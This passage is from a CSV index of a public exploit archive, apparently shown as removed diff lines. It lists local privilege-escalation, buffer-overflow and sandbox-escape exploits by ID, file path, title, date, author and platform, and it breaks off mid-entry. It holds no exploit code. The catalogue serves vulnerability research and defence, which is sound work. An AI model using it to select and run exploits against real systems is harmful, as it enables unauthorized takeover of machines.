-33572,exploits/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Local Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local, -33576,exploits/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local, -33589,exploits/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local, -33523,exploits/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local, -33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local, -33614,exploits/linux/local/33614.c,"dbus-glib pam_fprintd - Local Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local, -33623,exploits/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations",2010-02-10,"Tim Brown",linux,local, -33725,exploits/aix/local/33725.txt,"IBM AIX 6.1.8 - 'libodm' Arbitrary File Write",2014-06-12,Portcullis,aix,local, -40342,exploits/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local, -33791,exploits/arm/local/33791.rb,"Adobe Reader for Android < 11.2.0 - 'addJavascriptInterface' Local Overflow (Metasploit)",2014-06-17,Metasploit,arm,local, -33799,exploits/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local, -33808,exploits/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local, -33824,exploits/linux/local/33824.c,"Linux Kernel 3.13 - SGID Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local, -33892,exploits/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local, -33893,exploits/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local, -33899,exploits/linux/local/33899.txt,"Chkrootkit 0.49 - Local Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local, -33904,exploits/linux/local/33904.txt,"Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition",2014-06-28,"Dawid Golunski",linux,local, -33961,exploits/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,windows,local, -33963,exploits/linux/local/33963.txt,"gdomap - Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local, -34112,exploits/windows/local/34112.txt,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local, -34001,exploits/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local, -34037,exploits/win_x86/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Privilege Escalation",2014-07-12,LiquidWorm,win_x86,local, -40936,exploits/linux/local/40936.html,"Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution",2016-12-18,"Hacker Fantastic",linux,local, -34131,exploits/windows/local/34131.py,"Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local, -34134,exploits/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local, -34167,exploits/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,win_x86,local, -34267,exploits/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation",2010-07-07,"Bartlomiej Balcerek",linux,local, -40917,exploits/windows/local/40917.py,"Nidesoft MP3 Converter 2.6.18 - Local Buffer Overflow (SEH)",2016-12-15,malwrforensics,windows,local, -34272,exploits/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Privilege Escalation",2014-08-05,"ryujin & sickness",windows,local, -34311,exploits/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",solaris,local, -34313,exploits/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local, -34314,exploits/solaris/local/34314.sh,"Oracle Solaris Management Console - WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local, -34333,exploits/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Local Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local, -34331,exploits/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RET Buffer Overflow",2014-08-12,"Giovanni Bartolomucci",windows,local, -34421,exploits/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One",2014-08-27,"taviso & scarybeasts",linux,local, -34489,exploits/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,windows,local, -34512,exploits/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,windows,local, -34537,exploits/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local, -34648,exploits/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape (PoC)",2014-09-13,"Joxean Koret",windows,local, -34822,exploits/windows/local/34822.c,"Microsoft Windows - Local Procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,windows,local, -34923,exploits/linux/local/34923.c,"Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation",2014-10-09,"Andy Lutomirski",linux,local, -34921,exploits/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Local Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local, -34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",hardware,local, -34966,exploits/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation",2014-10-14,LiquidWorm,windows,local, -34967,exploits/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local, -34982,exploits/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Local Privilege Escalation (Metasploit)",2014-10-15,Metasploit,win_x86,local, -34987,exploits/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure",2010-11-09,"Dan Rosenberg",linux,local, -35010,exploits/ios/local/35010.txt,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,ios,local, -35019,exploits/windows/local/35019.py,"Microsoft Windows - OLE Package Manager SandWorm",2014-10-20,"Vlad Ovtchinikov",windows,local, -35020,exploits/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)",2014-10-20,Metasploit,win_x86,local, -35021,exploits/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local, -35040,exploits/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local, -35074,exploits/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Local Buffer Overflow",2014-10-27,metacom,windows,local, -35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local, -35101,exploits/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local, -35112,exploits/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Local Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local, -35161,exploits/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)",2012-01-12,zx2c4,linux,local, -35177,exploits/windows/local/35177.py,"i-FTP 2.20 - Local Buffer Overflow (SEH)",2014-11-06,metacom,windows,local, -35189,exploits/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local, -35216,exploits/windows/local/35216.py,"Microsoft Office 2007/2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local, -35234,exploits/linux/local/35234.py,"OSSEC 2.8 - 'hosts.deny' Local Privilege Escalation",2014-11-14,skynet-13,linux,local, -35235,exploits/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local, -35236,exploits/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local, -35322,exploits/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local, -35370,exploits/linux/local/35370.c,"Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation",2014-11-25,"Kaiqu Chen",linux,local, -35377,exploits/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)",2014-11-26,"Muhamad Fadzil Ramli",windows,local, -35395,exploits/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",windows,local, -35423,exploits/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS 13.1.4 - Local Privilege Escalation",2014-12-02,"Information Paradox",windows,local, -35440,exploits/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation (Metasploit)",2014-12-02,Metasploit,osx,local, -35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local, -35450,exploits/linux/local/35450.txt,"VFU 4.10-1.1 - Local Buffer Overflow",2014-12-03,"Juan Sacco",linux,local, -35472,exploits/lin_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",lin_x86-64,local, -35488,exploits/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local, -35503,exploits/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' Local Buffer Overflow (SEH)",2014-12-09,"Muhamad Fadzil Ramli",windows,local, -35590,exploits/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Local Privilege Escalation",2014-12-23,LiquidWorm,windows,local, -35595,exploits/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local, -35661,exploits/windows/local/35661.txt,"Microsoft Windows 8.1 (x86/x64) - 'ahcache.sys' NtApphelpCacheControl Privilege Escalation",2015-01-01,"Google Security Research",windows,local, -35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,windows,local, -35681,exploits/linux/local/35681.txt,"OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation",2011-04-29,"Stephane Chauveau",linux,local, -35712,exploits/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow (Metasploit)",2015-01-06,Metasploit,windows,local, -35711,exploits/android/local/35711.c,"Nexus 5 Android 5.0 - Local Privilege Escalation",2015-01-06,retme,android,local, -35732,exploits/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local, -35741,exploits/windows/local/35741.pl,"Palringo 2.8.1 - Local Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local, -35742,exploits/osx/local/35742.c,"Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local, -35746,exploits/linux/local/35746.sh,"RedStar 3.0 Desktop - Enable sudo Privilege Escalation",2015-01-11,"prdelka & ‏sfan55",linux,local, -35748,exploits/linux/local/35748.txt,"RedStar 2.0 Desktop - 'World-writeable rc.sysinit' Local Privilege Escalation",2015-01-11,prdelka,linux,local, -35749,exploits/linux/local/35749.txt,"RedStar 3.0 Desktop - 'Software Manager swmng.app' Local Privilege Escalation",2015-01-11,RichardG,linux,local, -35811,exploits/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - User Profile Service Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local, -35812,exploits/windows/local/35812.py,"T-Mobile Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,windows,local, -35813,exploits/windows/local/35813.py,"Congstar Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,windows,local, -35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local, -35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local, -35994,exploits/windows/local/35994.c,"BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local, -35847,exploits/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local, -35848,exploits/osx/local/35848.c,"Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,local, -35850,exploits/windows/local/35850.bat,"Microsoft Windows XP - 'tskill' Local Privilege Escalation",2011-06-13,"Todor Donev",windows,local, -35992,exploits/windows/local/35992.c,"K7 Computing (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local, -35901,exploits/windows/local/35901.txt,"VideoLAN VLC Media Player 2.1.5 - DEP Access Violation",2015-01-26,"Veysel HATAS",windows,local, -35902,exploits/windows/local/35902.txt,"VideoLAN VLC Media Player 2.1.5 - Write Access Violation",2015-01-26,"Veysel HATAS",windows,local, -35905,exploits/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation",2015-01-26,"Parvez Anwar",windows,local, -35983,exploits/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",2015-02-03,Metasploit,windows,local, -35934,exploits/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local, -35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,windows,local, -35953,exploits/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local, -35962,exploits/windows/local/35962.c,"Trend Micro 8.0.1133 (Multiple Products) - Local Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local, -35964,exploits/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Local Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local, -36052,exploits/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Local Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local, -36053,exploits/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",windows,local, -36062,exploits/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Local Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local, -36104,exploits/windows/local/36104.py,"Publish-It 3.6d - Local Buffer Overflow (SEH)",2015-02-18,"Andrew Smith",windows,local, -36143,exploits/osx/local/36143.txt,"Apple Mac OSX (Lion) - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local, -36188,exploits/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local, -36189,exploits/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Privilege Escalation",2015-02-26,LiquidWorm,windows,local, -36207,exploits/windows/local/36207.py,"Microsoft Word 2007 - RTF Object Confusion (ASLR + DEP Bypass)",2015-02-28,R-73eN,windows,local, -36229,exploits/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local, -36257,exploits/linux/local/36257.txt,"Trend Micro IWSS 3.1 - Local Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local, -36294,exploits/linux/local/36294.c,"Linux Kernel 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure",2011-11-07,"Vasiliy Kulikov",linux,local, -36296,exploits/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Local Privilege Escalation",2011-11-09,IKCE,bsd,local, -36310,exploits/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local, -36311,exploits/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local, -36327,exploits/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)",2011-11-22,instruder,windows,local, -36390,exploits/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation",2015-03-16,LiquidWorm,windows,local, -36417,exploits/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Local Privilege Escalation",2015-03-17,LiquidWorm,windows,local, -36424,exploits/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation",2015-03-19,"Google Security Research",windows,local, -36430,exploits/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Local Privilege Escalation",2011-12-08,anonymous,linux,local, -36437,exploits/windows/local/36437.rb,"Publish-It - '.PUI' Local Buffer Overflow (SEH) (Metasploit)",2015-03-19,Metasploit,windows,local, -36465,exploits/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local, -36476,exploits/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus - '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",windows,local, -36501,exploits/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local, -36502,exploits/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local, -36533,exploits/windows/local/36533.py,"IDM 6.20 - Local Buffer Overflow",2015-03-28,"TUNISIAN CYBER",windows,local, -36747,exploits/linux/local/36747.c,"Abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",linux,local, -36564,exploits/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation (PoC)",2015-03-30,"Sebastian Krahmer",linux,local, -36571,exploits/linux/local/36571.sh,"OverlayFS inode Security Checks - 'inode.c' Local Security Bypass",2012-01-17,"Gary Poster",linux,local, -36739,exploits/osx/local/36739.m,"Apple Mac OSX < 10.9/10 - Local Privilege Escalation",2015-04-13,mu-b,osx,local, -36692,exploits/osx/local/36692.py,"Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local, -36746,exploits/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation",2015-04-14,"Tavis Ormandy",linux,local, -36745,exploits/osx/local/36745.rb,"Apple Mac OSX - 'Rootpipe' Local Privilege Escalation (Metasploit)",2015-04-13,Metasploit,osx,local, -36782,exploits/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",linux,local, -36813,exploits/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local, -36819,exploits/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local, -36820,exploits/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local, -36822,exploits/windows/local/36822.pl,"Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local, -36826,exploits/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)",2015-04-23,ThreatActor,windows,local, -36827,exploits/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)",2015-04-24,naxxo,windows,local, -36837,exploits/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local, -37065,exploits/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local, -36855,exploits/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local, -36859,exploits/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local, -36887,exploits/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,linux,local, -36909,exploits/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local, -36920,exploits/windows/local/36920.py,"Mediacoder 0.8.34.5716 - '.m3u' Local Buffer Overflow (SEH)",2015-05-06,evil_comrade,windows,local, -36966,exploits/linux/local/36966.txt,"LightDM 1.0.6 - Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local, -36928,exploits/windows/local/36928.py,"Macro Toolworks 7.5 - Local Buffer Overflow",2012-03-08,"Julien Ahrens",windows,local, -36980,exploits/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - Local Buffer Overflow",2015-05-11,evil_comrade,windows,local, -36981,exploits/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Local Buffer Overflow",2015-05-11,evil_comrade,windows,local, -36982,exploits/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Local Buffer Overflow",2015-05-11,evil_comrade,windows,local, -37049,exploits/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local, -37052,exploits/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)",2015-05-18,4B5F5F4B,windows,local, -37056,exploits/windows/local/37056.py,"BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local, -37064,exploits/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local, -37088,exploits/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local, -37089,exploits/linux/local/37089.txt,"Fuse 2.9.3-15 - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local, -37098,exploits/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local, -37197,exploits/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Local Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",windows,local, -37167,exploits/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions",2015-06-01,"Hacker Fantastic",linux,local, -37168,exploits/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local, -37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Local Kernel",2015-06-02,"Hacker Fantastic",linux,local, -37211,exploits/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow",2015-06-05,metacom,windows,local, -37212,exploits/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local, -37265,exploits/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local, -37292,exploits/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation",2015-06-16,rebel,linux,local, -37293,exploits/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local, -37344,exploits/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local, -37367,exploits/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)",2015-06-24,Metasploit,windows,local, -37535,exploits/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - Local Buffer Overflow (SEH)",2015-07-08,Vulnerability-Lab,windows,local, -40709,exploits/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local, -37543,exploits/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local, -37631,exploits/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local, -37657,exploits/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local, -37670,exploits/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local, -37699,exploits/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local, -37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,windows,local, -37825,exploits/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Local Privilege Escalation",2015-08-18,kpwn,osx,local, -37710,exploits/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",linux,local, -37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local, -37722,exploits/lin_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local, -37724,exploits/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",lin_x86,local, -37730,exploits/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Local Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local, -37732,exploits/win_x86/local/37732.c,"Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local, -38106,exploits/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local, -38107,exploits/windows/local/38107.c,"Cisco Sourcefire User Agent 2.2 - Insecure File Permissions",2015-09-08,"Glafkos Charalambous",windows,local, -37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local, -37760,exploits/windows/local/37760.rb,"PDF Shaper 3.5 - Local Buffer Overflow (Metasploit)",2015-08-12,metacom,windows,local, -37768,exploits/windows/local/37768.txt,"Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation 